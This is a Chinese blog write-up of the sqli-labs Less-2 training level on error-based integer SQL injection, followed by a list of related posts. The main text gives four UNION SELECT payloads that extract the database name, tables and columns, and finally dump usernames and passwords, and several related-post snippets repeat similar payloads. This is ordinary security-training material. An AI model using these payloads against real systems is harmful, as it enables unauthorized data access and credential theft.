【SQL注入】Less-2错误型GET整型注入

最新推荐文章于 2022-12-05 17:45:13 发布
最新推荐文章于 2022-12-05 17:45:13 发布
阅读量281 收藏 1
点赞数
分类专栏: CTF 文章标签: mysql sql 数据库 ctf sql注入
原文链接:https://www.anquanlong.com/lab_introduce?lab_id=3
版权

Less-2错误型GET整型注入

什么是整形注入?可以理解位提交的URL参数为整数类型。

实验漏洞复现介绍

该实验与Less-1错误型GET单引号字符型注入 区别在于,构建payload时去掉'单引号

1、爆开数据库

payload

?id=0 union select 1,2,database() --+

2、爆开数据表

payload

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0 union select 1,group_concat(username,0x3a,password),3 from users--+
Mitch311
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GET-Error based-intiger based (基于错误的GET整型注入) Less-2
water0diamond的博客
03-12 1027
进入第二关,有了less-1的基础后,我们直接开始提交参数。判断是否有注入点。 测一下id可以观察到报错信息可以看出来是数字id,且没有任何包裹 使用order by http://localhost/sqli/Less-2/?id=1 order by 1%23 数字变化后可以试出字段 联合查询字段 http://localhost/sqli/Less-2/?id=-1 un...
sqli-labs靶场1-10关
Cobra的博客
04-05 354
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入) 一、手工UNION联合查询注入 1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。 2、爆数据库名 ?id=-1' union select 1,2,database() -- - (得到“security”数据库) 3、爆表名 ?id=-1' union select 1...
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 240
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
SQL注入攻击】GET-Error based - Intiger based (基于错误的GET整型注入)
sm1918451478的博客
10-21 921
SQL注入攻击】Error based - Intiger based (基于错误的GET整型注入)
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 192
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)】
小谢的博客
12-05 1825
本篇博客用于记录`SQLi`实验中第一阶段,即基础的`sql`注入,包括了GET和POST联合注入、时间盲注、布尔盲注、报错盲注、文件上传注入等并且内含一些笔者写的自动化注入代码~
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入 支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入笔记-union联合查询
最新发布
03-21
SQL注入笔记-union联合查询
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入工具-御剑
06-07
SQL注入攻击是网络安全中的重要话题,因为许多网站和应用程序都可能因编程错误而暴露于此类风险之下。御剑的出现,使得安全专业人员可以更加高效地定位和处理这类问题。 【文件名称列表】:御剑1.5-201610 这个...
联合查询注入3:sqli-labs less 1&less 2 基于错误的 GET 字符/整型注入
信安小菜鸡的博客
04-22 134
基本上与grade靶场操作一致:https://blog.csdn.net/weixin_44925883/article/details/116007030 由于题目已经给出为字符注入,便不再做判断。 判断输出位置 爆数据库名及用户 爆表名 http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where tab
sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)
ajxi63204的博客
01-18 260
与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 uni...
LESS2(sql注入
qq_44598397的博客
03-14 894
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
SQL注入之GET常规注入
Jim的博客
08-14 4434
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
sql注入 sql-lib Less-1
weixin_43745072的博客
11-20 260
less 1 寻找溢出点,判断注入 输入为1,显示正常 ?id=1 输入为1’,显示异常,并且输入为2-1,显示的是id=2的内容,初步判断是字符注入。同时从报错的到数据库mysql。 ?id=1' 注释引号,可以正常显示 ?id=1'# 判断有多少列,3不报错,4报错 ?id=-1' order by 3 # ?id=-1' order by 4 # 判断显示位,可以知道显示位是第2,3位 ?id=-1' union select 1,2,3 # 我们使
sqli-lbs-2 GET - Error based - Intiger based (基于错误的GET整型注入)
qq_45756971的博客
10-18 192
知识点:1,判断是数字还是字符,单引号还是双引号 2,union select联合查询注入 3,payload原理与防御措施 这道题与上道题的主要区别就是这个是整型,即这个题的id参数没有引号,只是数字,这意味着在你绕过的时候可以不需要对后面的引号过滤(如果没有其他干扰的话) 大概步骤:1.输入?id=2-1页面信息发生变化,说明此处是数值注入 2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据 3.接着可以使用联合查询进行注入,详细过程参考第一关 接下来
sql注入less2
Mdcq123的博客
10-15 236
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 835
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值